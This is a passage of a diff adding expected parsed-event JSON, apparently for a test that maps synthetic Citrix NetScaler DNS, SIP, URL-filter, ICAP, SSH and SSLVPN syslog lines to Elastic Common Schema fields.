"location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "allow", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_QUERY 4471 0 : Source 192.168.1.10:12345 - Destination 1.128.0.0:80 User: johndoe - Domain: example.com - Category: 15 Action: ALLOW - Reason: UserAuthenticated ", + "reason": "UserAuthenticated ", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.10", + "1.128.0.0", + "81.2.69.144" + ], + "user": [ + "johndoe" + ] + }, + "source": { + "ip": "192.168.1.10", + "port": 12345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.com", + "name": "johndoe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_RESPONSE 4471 0 : Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked ", + "device_event_class_id": "DNS", + "extended": { + "message": "Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked " + }, + "facility": "local0", + "host": "ns1", + "name": "DNS_RESPONSE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "DENY", + "category": "10", + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "domain": "example.org", + "message": "Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked ", + "reason": "CategoryBlocked ", + "source": { + "ip": "192.168.1.11", + "port": 23456 + }, + "user": "janedoe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "deny", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_RESPONSE 4471 0 : Source 192.168.1.11:23456 - Destination 1.128.0.0:443 User: janedoe - Domain: example.org - Category: 10 Action: DENY - Reason: CategoryBlocked ", + "reason": "CategoryBlocked ", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.11", + "1.128.0.0", + "81.2.69.144" + ], + "user": [ + "janedoe" + ] + }, + "source": { + "ip": "192.168.1.11", + "port": 23456 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.org", + "name": "janedoe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_ERROR 4471 0 : Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved ", + "device_event_class_id": "DNS", + "extended": { + "message": "Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved " + }, + "facility": "local0", + "host": "ns1", + "name": "DNS_ERROR", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "ALLOW", + "category": "20", + "destination": { + "ip": "1.128.0.0", + "port": 22 + }, + "domain": "example.net", + "message": "Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved ", + "reason": "AdminApproved ", + "source": { + "ip": "192.168.1.12", + "port": 34567 + }, + "user": "bobsmith" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 22 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "allow", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : DNS DNS_ERROR 4471 0 : Source 192.168.1.12:34567 - Destination 1.128.0.0:22 User: bobsmith - Domain: example.net - Category: 20 Action: ALLOW - Reason: AdminApproved ", + "reason": "AdminApproved ", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.12", + "1.128.0.0", + "81.2.69.144" + ], + "user": [ + "bobsmith" + ] + }, + "source": { + "ip": "192.168.1.12", + "port": 34567 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.net", + "name": "bobsmith" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_SIP_INFO_PACKET_EVENT 4471 0 : Infomsg: \"SIP request received\" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org -", + "device_event_class_id": "ALG", + "extended": { + "message": "Infomsg: \"SIP request received\" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org -" + }, + "facility": "local0", + "host": "ns1", + "name": "ALG_SIP_INFO_PACKET_EVENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "call_id": "uvw456", + "callee": { + "domain_name": "example.org", + "user_name": "user6" + }, + "caller": { + "domain_name": "example.org", + "user_name": "user5" + }, + "content_type": "text/plain", + "destination": { + "ip": "1.128.0.0", + "port": 25061 + }, + "group": "Requests", + "infomsg": "SIP request received", + "message": "Infomsg: \"SIP request received\" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org -", + "method": "BYE", + "natted": { + "ip": "1.128.0.0", + "port": 20000 + }, + "register": "NO", + "sequence_number": 303, + "source": { + "ip": "1.128.0.0", + "port": 25060 + }, + "transport": "UDP" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "nat": { + "ip": "1.128.0.0", + "port": 20000 + }, + "port": 25061, + "user": { + "domain": "example.org", + "name": "user6" + } + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_SIP_INFO_PACKET_EVENT 4471 0 : Infomsg: \"SIP request received\" - Group: Requests - Call_ID: uvw456 - Transport: UDP - Source_IP: 1.128.0.0 - Source_port: 25060 - Destination_IP: 1.128.0.0 - Destination_port: 25061 - Natted_IP: 1.128.0.0 - Natted_port: 20000 - Method: BYE - Sequence_Number: 303 - Register: NO - Content_Type: text/plain - Caller_user_name: user5 - Callee_user_name: user6 - Caller_domain_name: example.org - Callee_domain_name: example.org -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Requests" + }, + "http": { + "request": { + "method": "BYE" + } + }, + "message": "SIP request received", + "network": { + "transport": "udp" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ], + "user": [ + "user5", + "user6" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 25060, + "user": { + "domain": "example.org", + "name": "user5" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_RTSP_INFO_DELETE_CALL_PACKET_EVENT 4471 0 : Infomsg: \"Log info RTSP ALG call deletion\" - Group: RTSPALG - Session_ID: session123 -", + "device_event_class_id": "ALG", + "extended": { + "message": "Infomsg: \"Log info RTSP ALG call deletion\" - Group: RTSPALG - Session_ID: session123 -" + }, + "facility": "local0", + "host": "ns1", + "name": "ALG_RTSP_INFO_DELETE_CALL_PACKET_EVENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "group": "RTSPALG", + "infomsg": "Log info RTSP ALG call deletion", + "message": "Infomsg: \"Log info RTSP ALG call deletion\" - Group: RTSPALG - Session_ID: session123 -", + "session_id": "session123" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : ALG ALG_RTSP_INFO_DELETE_CALL_PACKET_EVENT 4471 0 : Infomsg: \"Log info RTSP ALG call deletion\" - Group: RTSPALG - Session_ID: session123 -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "RTSPALG" + }, + "message": "Log info RTSP ALG call deletion", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : URLFILT URLFILT_LOG 4471 0 : Source 192.168.1.100 - Destination 1.128.0.0 URL www.example.com/page - Category Technology - Categorygroup Internet - Reputation 3 - Policyaction ALLOW", + "device_event_class_id": "URLFILT", + "extended": { + "message": "Source 192.168.1.100 - Destination 1.128.0.0 URL www.example.com/page - Category Technology - Categorygroup Internet - Reputation 3 - Policyaction ALLOW" + }, + "facility": "local0", + "host": "ns1", + "name": "URLFILT_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "category": "Technology", + "category_group": "Internet", + "destination": { + "ip": "1.128.0.0" + }, + "policy_action": "ALLOW", + "reputation": 3, + "source": { + "ip": "192.168.1.100" + }, + "url": "www.example.com/page" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : URLFILT URLFILT_LOG 4471 0 : Source 192.168.1.100 - Destination 1.128.0.0 URL www.example.com/page - Category Technology - Categorygroup Internet - Reputation 3 - Policyaction ALLOW", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.100", + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "ip": "192.168.1.100" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "extension": "com/page", + "original": "www.example.com/page", + "path": "www.example.com/page" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI ICAP_LOG 4471 0 : Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY", + "device_event_class_id": "CI", + "extended": { + "message": "Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY" + }, + "facility": "local0", + "host": "ns1", + "name": "ICAP_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "MODIFY", + "content_type": "application/json", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "domain": "example.org", + "icap_server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "message": "Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY", + "mode": "PREVIEW", + "response": { + "code": 200 + }, + "service": "WebFilter", + "source": { + "ip": "192.168.1.101", + "port": 1234 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "modify", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI ICAP_LOG 4471 0 : Source 192.168.1.101:1234 - Destination 1.128.0.0:80 - Domain example.org - Content-Type application/json - ICAPServer 192.168.1.102:1344 - Mode PREVIEW - Service WebFilter - Response 200 - Action MODIFY", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "http": { + "response": { + "status_code": 200 + } + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.101", + "1.128.0.0", + "192.168.1.102", + "81.2.69.144" + ] + }, + "server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "source": { + "ip": "192.168.1.101", + "port": 1234 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.org" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI INLINE_INSPECTION_LOG 4471 0 : ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS - URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344", + "device_event_class_id": "CI", + "extended": { + "message": "ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS - URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344" + }, + "facility": "local0", + "host": "ns1", + "name": "INLINE_INSPECTION_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "ALLOW", + "bytes": { + "received": 2000, + "sent": 1500 + }, + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "domain": "example.org", + "icap_server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "id": "1234567890", + "message": "ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS - URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344", + "protocol": "HTTPS", + "service": "Authentication", + "source": { + "ip": "192.168.1.102", + "port": 2345 + }, + "url": "https://www.example.org/login" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 2000, + "ip": "1.128.0.0", + "port": 443 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "allow", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI INLINE_INSPECTION_LOG 4471 0 : ID 1234567890 - Source 192.168.1.102:2345 - Destination 1.128.0.0:443 Protocol HTTPS - URL https://www.example.org/login - Domain example.org - Service Authentication - Category Login - Action ALLOW - BytesSent 1500 - BytesReceived 2000 - OriginServer 192.168.1.102:1344", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "network": { + "protocol": "https" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.102", + "1.128.0.0", + "81.2.69.144" + ] + }, + "server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "source": { + "bytes": 1500, + "ip": "192.168.1.102", + "port": 2345 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "www.example.org", + "original": "https://www.example.org/login", + "path": "/login", + "scheme": "https" + }, + "user": { + "domain": "example.org" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI TRAFFIC_MIRROR_LOG 4471 0 : ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344", + "device_event_class_id": "CI", + "extended": { + "message": "ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344" + }, + "facility": "local0", + "host": "ns1", + "name": "TRAFFIC_MIRROR_LOG", + "priority": "info" + }, + "citrix_adc": { + "log": { + "action": "DENY", + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "domain": "example.net", + "id": "1234567891", + "message": "ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344", + "origin_server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "protocol": "SSH", + "request": { + "bytes_sent": 0 + }, + "response": { + "bytes_sent": 0 + }, + "service": "TerminalAccess", + "source": { + "ip": "192.168.1.103", + "port": 3456 + }, + "url": "ssh://1.128.0.0" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "deny", + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : CI TRAFFIC_MIRROR_LOG 4471 0 : ID 1234567891 - Source 192.168.1.103:3456 - Destination 1.128.0.0:443 Protocol SSH - URL ssh://1.128.0.0 - Domain example.net - Service TerminalAccess - Category SecureShell - Action DENY - RequestBytesSent 0 - ResponseBytesSent 0 - OriginServer 192.168.1.102:1344", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "network": { + "protocol": "ssh" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.103", + "1.128.0.0", + "192.168.1.102", + "81.2.69.144" + ] + }, + "server": { + "ip": "192.168.1.102", + "port": 1344 + }, + "source": { + "ip": "192.168.1.103", + "port": 3456 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "1.128.0.0", + "original": "ssh://1.128.0.0", + "scheme": "ssh" + }, + "user": { + "domain": "example.net" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"", + "device_event_class_id": "UI", + "extended": { + "message": "User jane.doe - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"" + }, + "facility": "local0", + "host": "ns1", + "name": "CMD_EXECUTED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "command": "scp file.txt", + "remote_ip": "192.168.1.105", + "status": "Success", + "user": "jane.doe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "process" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"", + "outcome": "success", + "severity": 0, + "timezone": "GMT", + "type": [ + "start" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "process": { + "command_line": "scp file.txt" + }, + "related": { + "ip": [ + "192.168.1.105", + "81.2.69.144" + ], + "user": [ + "jane.doe" + ] + }, + "source": { + "ip": "192.168.1.105" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "jane.doe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGIN 4471 0 : User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type \"Chrome\" - SSLVPN_client_type NetScalerPlugin - Group(s) \"IT,RemoteWorkers\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type \"Chrome\" - SSLVPN_client_type NetScalerPlugin - Group(s) \"IT,RemoteWorkers\"" + }, + "facility": "local0", + "host": "ns1", + "name": "LOGIN", + "priority": "info" + }, + "citrix_adc": { + "log": { + "browser_type": "Chrome", + "client_ip": "192.168.1.50", + "groups": "IT,RemoteWorkers", + "message": "User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type \"Chrome\" - SSLVPN_client_type NetScalerPlugin - Group(s) \"IT,RemoteWorkers\"", + "nat": { + "ip": "10.0.0.50" + }, + "sslvpn_client_type": "NetScalerPlugin", + "user": "JohnDoe", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "ip": "192.168.1.50" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGIN 4471 0 : User JohnDoe - Client_ip 192.168.1.50 - Nat_ip 10.0.0.50 - Vserver 1.128.0.0:443 - Browser_type \"Chrome\" - SSLVPN_client_type NetScalerPlugin - Group(s) \"IT,RemoteWorkers\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "IT,RemoteWorkers" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.0.0.50", + "1.128.0.0", + "192.168.1.50" + ], + "user": [ + "JohnDoe" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "nat": { + "ip": "10.0.0.50" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "JohnDoe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGOUT 4471 0 : User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time \"2023-04-01T08:00:00Z\" - End_time \"2023-04-01T12:00:00Z\" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod \"Timeout\" - Group(s) \"HR,Finance\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time \"2023-04-01T08:00:00Z\" - End_time \"2023-04-01T12:00:00Z\" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod \"Timeout\" - Group(s) \"HR,Finance\"" + }, + "facility": "local0", + "host": "ns1", + "name": "LOGOUT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "192.168.1.51", + "compression_ratio_recieved": 70.0, + "compression_ratio_send": 50.0, + "duration": "00:00:04", + "end_time": "2023-04-01T12:00:00.000Z", + "groups": "HR,Finance", + "http_resources_accessed": "15", + "logout_method": "Timeout", + "message": "User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time \"2023-04-01T08:00:00Z\" - End_time \"2023-04-01T12:00:00Z\" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod \"Timeout\" - Group(s) \"HR,Finance\"", + "nat": { + "ip": "10.0.0.51" + }, + "non_http_services_accessed": "5", + "start_time": "2023-04-01T08:00:00.000Z", + "total_bytes_received": 500, + "total_bytes_send": 1, + "total_compressed_bytes_recieved": 350, + "total_compressed_bytes_send": 700, + "total_policies_allowed": 25, + "total_policies_denied": 5, + "total_tcp_connections": 20, + "total_udp_flows": 10, + "user": "JaneSmith", + "vserver": { + "ip": "1.128.0.0", + "port": 10443 + } + } + }, + "client": { + "ip": "192.168.1.51" + }, + "destination": { + "bytes": 500 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2023-04-01T12:00:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LOGOUT 4471 0 : User JaneSmith - Client_ip 192.168.1.51 - Nat_ip 10.0.0.51 - Vserver 1.128.0.0:10443 - Start_time \"2023-04-01T08:00:00Z\" - End_time 